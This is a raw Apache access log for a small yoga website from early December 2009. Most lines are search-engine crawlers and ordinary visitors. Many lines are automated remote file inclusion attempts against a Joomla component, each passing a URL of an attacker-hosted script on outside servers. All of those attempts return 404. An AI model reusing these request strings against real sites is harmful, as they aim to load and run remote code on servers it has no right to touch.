67.195.111.39 - - [01/Dec/2009:10:53:35 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.peaceyoga.com"
67.195.111.39 - - [01/Dec/2009:10:53:43 -0800] "GET /logs/access_070301.log HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.peaceyoga.com"
119.63.198.10 - - [01/Dec/2009:12:39:13 -0800] "GET /logs/access_080905.log HTTP/1.1" 404 - "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "www.peaceyoga.com"
66.43.101.242 - - [01/Dec/2009:12:41:00 -0800] "GET / HTTP/1.1" 200 916 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2)" "www.peaceyoga.com"
66.43.101.242 - - [01/Dec/2009:12:41:01 -0800] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2)" "www.peaceyoga.com"
69.181.102.84 - - [01/Dec/2009:14:28:14 -0800] "GET / HTTP/1.1" 200 916 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9" "peaceyoga.com"
69.181.102.84 - - [01/Dec/2009:14:28:15 -0800] "GET /favicon.ico HTTP/1.1" 404 - "http://peaceyoga.com/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9" "peaceyoga.com"
150.70.84.44 - - [01/Dec/2009:14:31:47 -0800] "GET / HTTP/1.0" 200 900 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "peaceyoga.com"
194.110.162.83 - - [01/Dec/2009:19:18:41 -0800] "GET /logs/access_090101.log HTTP/1.1" 200 3048 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.peaceyoga.com"
75.101.242.106 - - [01/Dec/2009:22:02:14 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "SheenBot/SheenBot-1.0.1 (Sheen web crawler)" "www.peaceyoga.com"
75.101.242.106 - - [01/Dec/2009:22:02:14 -0800] "GET / HTTP/1.0" 200 900 "-" "SheenBot/SheenBot-1.0.1 (Sheen web crawler)" "www.peaceyoga.com"
58.111.183.163 - - [01/Dec/2009:22:44:47 -0800] "GET / HTTP/1.1" 200 916 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)" "www.peaceyoga.com"
58.111.183.163 - - [01/Dec/2009:22:44:48 -0800] "GET /favicon.ico HTTP/1.0" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)" "www.peaceyoga.com"
58.111.183.163 - - [01/Dec/2009:22:44:51 -0800] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)" "www.peaceyoga.com"
67.195.114.60 - - [02/Dec/2009:00:23:56 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "peaceyoga.com"
67.195.114.60 - - [02/Dec/2009:00:23:56 -0800] "GET /_private/ HTTP/1.0" 403 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "peaceyoga.com"
67.195.111.39 - - [02/Dec/2009:00:48:12 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.peaceyoga.com"
67.195.111.39 - - [02/Dec/2009:00:48:13 -0800] "GET / HTTP/1.0" 200 900 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.peaceyoga.com"
67.195.111.39 - - [02/Dec/2009:08:13:36 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.peaceyoga.com"
67.195.111.39 - - [02/Dec/2009:08:13:36 -0800] "GET /logs/access_071231.log HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.peaceyoga.com"
66.249.71.181 - - [02/Dec/2009:21:50:18 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.peaceyoga.com"
72.44.39.186 - - [03/Dec/2009:01:56:09 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "SheenBot/SheenBot-1.0.1 (Sheen web crawler)" "www.peaceyoga.com"
72.44.39.186 - - [03/Dec/2009:01:56:09 -0800] "GET / HTTP/1.0" 200 900 "-" "SheenBot/SheenBot-1.0.1 (Sheen web crawler)" "www.peaceyoga.com"
95.108.142.150 - - [03/Dec/2009:02:08:46 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.peaceyoga.com"
95.108.142.150 - - [03/Dec/2009:02:08:48 -0800] "GET / HTTP/1.1" 200 916 "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.peaceyoga.com"
95.108.142.150 - - [03/Dec/2009:02:08:50 -0800] "GET / HTTP/1.1" 200 916 "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.peaceyoga.com"
95.108.142.150 - - [03/Dec/2009:02:26:47 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.peaceyoga.com"
95.108.142.150 - - [03/Dec/2009:02:26:49 -0800] "GET / HTTP/1.0" 200 900 "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.peaceyoga.com"
95.108.142.150 - - [03/Dec/2009:02:26:51 -0800] "GET / HTTP/1.1" 200 916 "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.peaceyoga.com"
95.111.15.37 - - [03/Dec/2009:12:19:23 -0800] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5" "www.peaceyoga.com"
85.26.183.77 - - [03/Dec/2009:12:50:50 -0800] "GET /logs/access_081101.log HTTP/1.1" 200 4529 "http://www.google.ru/search?client=opera&rls=ru&q=66.249.71.182+Mozilla/5.0+(compatible%3B+Googlebot/2.1%3B+%2Bhttp://www.google.com/bot.html)&sourceid=opera&ie=utf-8&oe=utf-8" "Opera/9.80 (Windows NT 6.0; U; ru) Presto/2.2.15 Version/10.10" "www.peaceyoga.com"
67.195.112.39 - - [03/Dec/2009:20:16:01 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "peaceyoga.com"
67.195.112.39 - - [03/Dec/2009:20:16:02 -0800] "GET /tmp/?D=A HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "peaceyoga.com"
67.195.37.173 - - [03/Dec/2009:22:50:22 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "peaceyoga.com"
67.195.37.173 - - [03/Dec/2009:22:50:23 -0800] "GET /?N=A HTTP/1.0" 200 900 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "peaceyoga.com"
174.132.239.74 - - [04/Dec/2009:01:08:41 -0800] "GET / HTTP/1.1" 200 916 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705)" "peaceyoga.com"
119.63.198.43 - - [04/Dec/2009:04:25:59 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" "www.peaceyoga.com"
61.66.28.36 - - [04/Dec/2009:08:06:06 -0800] "GET /joomla/index.php?option=com_restaurante&task=http://ikant.co.kr/data/v5.4id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.peaceyoga.com"
61.66.28.36 - - [04/Dec/2009:08:06:06 -0800] "GET /logs/access_090329.log%20%20/joomla/index.php?option=com_restaurante&task=http://ikant.co.kr/data/v5.4id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.peaceyoga.com"
61.66.28.36 - - [04/Dec/2009:08:06:06 -0800] "GET /logs/joomla/index.php?option=com_restaurante&task=http://ikant.co.kr/data/v5.4id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.peaceyoga.com"
209.92.156.53 - - [04/Dec/2009:08:14:35 -0800] "GET /logs/joomla/index.php?option=com_restaurante&task=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.peaceyoga.com"
209.92.156.53 - - [04/Dec/2009:08:14:35 -0800] "GET /joomla/index.php?option=com_restaurante&task=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.peaceyoga.com"
209.92.156.53 - - [04/Dec/2009:08:14:35 -0800] "GET /logs/access_090329.log%20%20/joomla/index.php?option=com_restaurante&task=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.peaceyoga.com"
209.92.156.53 - - [04/Dec/2009:08:15:00 -0800] "GET /logs/access_090329.log/joomla/index.php?option=com_restaurante&task=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.peaceyoga.com"
64.34.111.74 - - [04/Dec/2009:11:11:37 -0800] "GET /joomla/index.php?option=com_restaurante&task=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.peaceyoga.com"
64.34.111.74 - - [04/Dec/2009:11:11:37 -0800] "GET /logs/joomla/index.php?option=com_restaurante&task=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.peaceyoga.com"
64.34.111.74 - - [04/Dec/2009:11:11:37 -0800] "GET /logs/joomla/index.php?option=com_restaurante&task=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.peaceyoga.com"
64.34.111.74 - - [04/Dec/2009:11:11:37 -0800] "GET /logs/access_090329.log%20%20/joomla/index.php?option=com_restaurante&task=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.peaceyoga.com"
64.34.111.74 - - [04/Dec/2009:11:11:37 -0800] "GET /joomla/index.php?option=com_restaurante&task=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.peaceyoga.com"
64.34.111.74 - - [04/Dec/2009:11:11:37 -0800] "GET /logs/access_090329.log%20%20/joomla/index.php?option=com_restaurante&task=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.peaceyoga.com"
67.195.111.39 - - [04/Dec/2009:11:22:28 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.peaceyoga.com"
67.195.111.39 - - [04/Dec/2009:11:22:28 -0800] "GET /logs/access.log HTTP/1.0" 200 9639 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.peaceyoga.com"
67.195.111.39 - - [04/Dec/2009:11:34:55 -0800] "GET /logs/access_080301.log HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.peaceyoga.com"
67.195.111.237 - - [04/Dec/2009:13:14:34 -0800] "GET /?M=A HTTP/1.0" 200 900 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "peaceyoga.com"
143.232.155.49 - - [04/Dec/2009:15:30:28 -0800] "GET / HTTP/1.1" 200 916 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.4; en-US; rv:1.9.1.1) Gecko/20090715 Firefox/3.5.1" "www.peaceyoga.com"
143.232.155.49 - - [04/Dec/2009:15:30:28 -0800] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.4; en-US; rv:1.9.1.1) Gecko/20090715 Firefox/3.5.1" "www.peaceyoga.com"
143.232.155.49 - - [04/Dec/2009:15:30:31 -0800] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.4; en-US; rv:1.9.1.1) Gecko/20090715 Firefox/3.5.1" "www.peaceyoga.com"
76.249.190.114 - - [04/Dec/2009:17:03:06 -0800] "GET / HTTP/1.1" 200 916 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.4; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5" "www.peaceyoga.com"
76.249.190.114 - - [04/Dec/2009:17:03:06 -0800] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.4; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5" "www.peaceyoga.com"
76.249.190.114 - - [04/Dec/2009:17:03:09 -0800] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.4; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5" "www.peaceyoga.com"
67.195.111.39 - - [05/Dec/2009:01:35:23 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.peaceyoga.com"
67.195.111.39 - - [05/Dec/2009:01:35:23 -0800] "GET /tmp/?D=A HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.peaceyoga.com"
67.195.111.39 - - [05/Dec/2009:02:16:21 -0800] "GET /logs/access_081201.log HTTP/1.0" 200 100743 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.peaceyoga.com"
77.221.130.19 - - [05/Dec/2009:03:22:37 -0800] "GET /joomla/index.php?option=com_restaurante&task=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.peaceyoga.com"
77.221.130.19 - - [05/Dec/2009:03:22:37 -0800] "GET /logs/access_090329.log%20%20/joomla/index.php?option=com_restaurante&task=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.peaceyoga.com"
77.221.130.19 - - [05/Dec/2009:03:22:37 -0800] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.peaceyoga.com"
77.221.130.19 - - [05/Dec/2009:03:22:37 -0800] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.peaceyoga.com"
77.221.130.19 - - [05/Dec/2009:03:22:37 -0800] "GET /joomla/index.php?option=com_restaurante&task=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.peaceyoga.com"
77.221.130.19 - - [05/Dec/2009:03:22:37 -0800] "GET /logs/access_090329.log%20%20/joomla/index.php?option=com_restaurante&task=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.peaceyoga.com"
77.222.40.217 - - [05/Dec/2009:05:32:35 -0800] "GET /joomla/index.php?option=com_restaurante&task=http://chiedere.interfree.it/bot.txt????? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.peaceyoga.com"
77.222.40.217 - - [05/Dec/2009:05:34:45 -0800] "GET /logs/access_090329.log/joomla/index.php?option=com_restaurante&task=http://chiedere.interfree.it/bot.txt????? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.peaceyoga.com"
77.222.40.217 - - [05/Dec/2009:05:34:46 -0800] "GET /joomla/index.php?option=com_restaurante&task=http://chiedere.interfree.it/bot.txt????? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.peaceyoga.com"
77.222.40.217 - - [05/Dec/2009:05:34:46 -0800] "GET /logs/joomla/index.php?option=com_restaurante&task=http://chiedere.interfree.it/bot.txt????? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.peaceyoga.com"
87.139.66.104 - - [05/Dec/2009:09:02:15 -0800] "GET /joomla/index.php?option=com_restaurante&task=http://www.cinti.ru/netcat_files/3453.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.peaceyoga.com"
87.139.66.104 - - [05/Dec/2009:09:02:15 -0800] "GET /logs/access_090329.log/joomla/index.php?option=com_restaurante&task=http://www.cinti.ru/netcat_files/3453.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.peaceyoga.com"
87.139.66.104 - - [05/Dec/2009:09:02:15 -0800] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.cinti.ru/netcat_files/3453.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.peaceyoga.com"
80.93.58.162 - - [05/Dec/2009:09:02:17 -0800] "GET /logs/access_090329.log/joomla/index.php?option=com_restaurante&task=http://edu2.zfw.etc.tu-bs.de/idne.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.peaceyoga.com"
89.203.208.203 - - [05/Dec/2009:09:02:23 -0800] "GET /logs/access_090329.log/joomla/index.php?option=com_restaurante&task=http://www.cinti.ru/netcat_files/3453.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.peaceyoga.com"
66.228.161.111 - - [05/Dec/2009:09:17:17 -0800] "GET / HTTP/1.1" 200 916 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "peaceyoga.com"
77.88.29.247 - - [05/Dec/2009:11:14:55 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.peaceyoga.com"
72.94.249.37 - - [05/Dec/2009:15:05:50 -0800] "GET / HTTP/1.1" 200 916 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.peaceyoga.com"
67.195.111.39 - - [05/Dec/2009:18:38:32 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.peaceyoga.com"
67.195.111.39 - - [05/Dec/2009:18:38:33 -0800] "GET /?S=D HTTP/1.0" 200 900 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.peaceyoga.com"
74.241.153.139 - - [05/Dec/2009:19:18:12 -0800] "GET /logs/access_081101.log HTTP/1.1" 200 4529 "http://www.google.com/search?q=windows-media-player%2F10.00.00.3990&ie=utf-8&oe=utf-8&aq=t&client=firefox-a&rlz=1R1GGGL_en___US315" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 GTB6 (.NET CLR 3.5.30729)" "www.peaceyoga.com"
74.241.153.139 - - [05/Dec/2009:19:18:13 -0800] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 GTB6 (.NET CLR 3.5.30729)" "www.peaceyoga.com"
77.88.29.247 - - [05/Dec/2009:23:52:07 -0800] "GET / HTTP/1.1" 200 916 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.peaceyoga.com"
67.195.111.39 - - [06/Dec/2009:04:53:34 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.peaceyoga.com"
67.195.111.39 - - [06/Dec/2009:04:53:35 -0800] "GET /tmp/ HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.peaceyoga.com"
67.195.111.237 - - [06/Dec/2009:20:31:17 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "peaceyoga.com"
67.195.111.237 - - [06/Dec/2009:20:31:17 -0800] "GET / HTTP/1.0" 200 900 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "peaceyoga.com"
67.195.111.237 - - [06/Dec/2009:20:58:58 -0800] "GET /?S=D HTTP/1.0" 200 900 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "peaceyoga.com"
70.43.33.158 - - [07/Dec/2009:10:31:20 -0800] "GET /logs/access_090329.log%20%20/joomla/index.php?option=com_restaurante&task=http://z3r0s31.altervista.org/.ss/.pp/.r/r0x-id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.peaceyoga.com"
70.43.33.158 - - [07/Dec/2009:10:32:12 -0800] "GET /logs/access_090329.log/joomla/index.php?option=com_restaurante&task=http://z3r0s31.altervista.org/.ss/.pp/.r/r0x-id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.peaceyoga.com"
71.139.195.169 - - [07/Dec/2009:16:47:51 -0800] "GET / HTTP/1.1" 200 916 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19" "www.peaceyoga.com"
71.139.195.169 - - [07/Dec/2009:16:47:52 -0800] "GET /favicon.ico HTTP/1.1" 404 - "http://www.peaceyoga.com/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19" "www.peaceyoga.com"
92.50.143.90 - - [08/Dec/2009:02:15:13 -0800] "GET /joomla/index.php?option=com_restaurante&task=http://www.ikant.co.kr///data/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.peaceyoga.com"
92.50.143.90 - - [08/Dec/2009:02:15:13 -0800] "GET /logs/access_090329.log%20%20/joomla/index.php?option=com_restaurante&task=http://www.ikant.co.kr///data/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.peaceyoga.com"
92.50.143.90 - - [08/Dec/2009:02:15:13 -0800] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.ikant.co.kr///data/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.peaceyoga.com"
61.66.28.36 - - [08/Dec/2009:02:15:40 -0800] "GET /joomla/index.php?option=com_restaurante&task=http://ikant.co.kr/data/v5.4id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.peaceyoga.com"
61.66.28.36 - - [08/Dec/2009:02:15:40 -0800] "GET /logs/access_090329.log%20%20/joomla/index.php?option=com_restaurante&task=http://ikant.co.kr/data/v5.4id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.peaceyoga.com"
61.66.28.36 - - [08/Dec/2009:02:15:45 -0800] "GET /logs/joomla/index.php?option=com_restaurante&task=http://ikant.co.kr/data/v5.4id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.peaceyoga.com"
92.50.143.90 - - [08/Dec/2009:02:15:45 -0800] "GET /joomla/index.php?option=com_restaurante&task=http://www.ikant.co.kr///data/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.peaceyoga.com"
92.50.143.90 - - [08/Dec/2009:02:15:45 -0800] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.ikant.co.kr///data/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.peaceyoga.com"
92.50.143.90 - - [08/Dec/2009:02:15:45 -0800] "GET /logs/access_090329.log/joomla/index.php?option=com_restaurante&task=http://www.ikant.co.kr///data/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.peaceyoga.com"
92.50.143.90 - - [08/Dec/2009:02:15:49 -0800] "GET /logs/access_090329.log/joomla/index.php?option=com_restaurante&task=http://www.ikant.co.kr///data/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.peaceyoga.com"
92.50.143.90 - - [08/Dec/2009:02:15:49 -0800] "GET /joomla/index.php?option=com_restaurante&task=http://www.ikant.co.kr///data/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.peaceyoga.com"
92.50.143.90 - - [08/Dec/2009:02:15:49 -0800] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.ikant.co.kr///data/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.peaceyoga.com"
61.66.28.36 - - [08/Dec/2009:02:16:03 -0800] "GET /joomla/index.php?option=com_restaurante&task=http://ikant.co.kr/data/v5.4id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.peaceyoga.com"
61.66.28.36 - - [08/Dec/2009:02:16:03 -0800] "GET /logs/access_090329.log/joomla/index.php?option=com_restaurante&task=http://ikant.co.kr/data/v5.4id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.peaceyoga.com"
61.66.28.36 - - [08/Dec/2009:02:16:03 -0800] "GET /logs/joomla/index.php?option=com_restaurante&task=http://ikant.co.kr/data/v5.4id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.peaceyoga.com"
216.65.57.4 - - [08/Dec/2009:06:53:21 -0800] "GET /joomla/index.php?option=com_restaurante&task=http://www.j-vision.co.kr/company/hotel/index.php/bo.do?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.peaceyoga.com"
216.65.57.4 - - [08/Dec/2009:06:53:41 -0800] "GET /logs/access_090329.log/joomla/index.php?option=com_restaurante&task=http://www.j-vision.co.kr/company/hotel/index.php/bo.do?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.peaceyoga.com"
216.65.57.4 - - [08/Dec/2009:06:53:41 -0800] "GET /joomla/index.php?option=com_restaurante&task=http://www.j-vision.co.kr/company/hotel/index.php/bo.do?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.peaceyoga.com"
216.65.57.4 - - [08/Dec/2009:06:53:41 -0800] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.j-vision.co.kr/company/hotel/index.php/bo.do?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.peaceyoga.com"
195.56.77.54 - - [08/Dec/2009:06:56:05 -0800] "GET /joomla/index.php?option=com_restaurante&task=http://maniacos.net/_vti_tmp?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.peaceyoga.com"
195.56.77.54 - - [08/Dec/2009:06:56:05 -0800] "GET /logs/joomla/index.php?option=com_restaurante&task=http://maniacos.net/_vti_tmp?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.peaceyoga.com"
195.56.77.54 - - [08/Dec/2009:06:56:06 -0800] "GET /logs/access_090329.log%20%20/joomla/index.php?option=com_restaurante&task=http://maniacos.net/_vti_tmp?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.peaceyoga.com"
195.137.160.90 - - [08/Dec/2009:06:56:15 -0800] "GET /logs/joomla/index.php?option=com_restaurante&task=http://maniacos.net/_vti_tmp?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.peaceyoga.com"
